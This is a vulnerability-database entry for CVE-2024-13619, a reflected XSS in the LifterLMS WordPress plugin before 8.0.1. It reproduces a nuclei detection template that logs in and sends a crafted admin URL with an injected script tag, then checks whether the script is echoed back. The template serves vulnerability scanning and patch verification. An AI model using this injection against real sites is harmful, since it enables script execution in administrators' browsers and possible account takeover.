Lucene search
K

LifterLMS < 8.0.1 - Cross-Site Scripting

🗓️ 12 Jul 2026 03:00:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Reflected XSS in LifterLMS before 8.0.1 enables admin script execution through unsanitized output.

Related
Refs
Code
id: CVE-2024-13619

info:
  name: LifterLMS < 8.0.1 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    LifterLMS WordPress plugin before 8.0.1 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin via a crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to version 8.0.1 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms/lifterlms-800-reflected-cross-site-scripting
    - https://wpscan.com/vulnerability/97a7e1a6-0fb3-49e9-86fc-ebb1d426fcca/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13619
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13619
    cwe-id: CWE-79
    epss-score: 0.00521
    epss-percentile: 0.40593
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="lifterlms"
  tags: cve,cve2024,wordpress,wp,wp-plugin,lifterlms,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=llms_form&_llms_bbp_forum_ids=1&"></script><script>alert("document_domain")</script><script>=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "</script><script>alert(\"document_domain\")</script><script>", "llms_form")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100f3002aa33c28e7f582a1d293df1638e070b9a51b19c781d65455665487659219022100ef452094ebac83ca4eb2952ce2b8b9189a06366a477436e47ce960d0da5e18a1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 22:50Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.00521
SSVC
8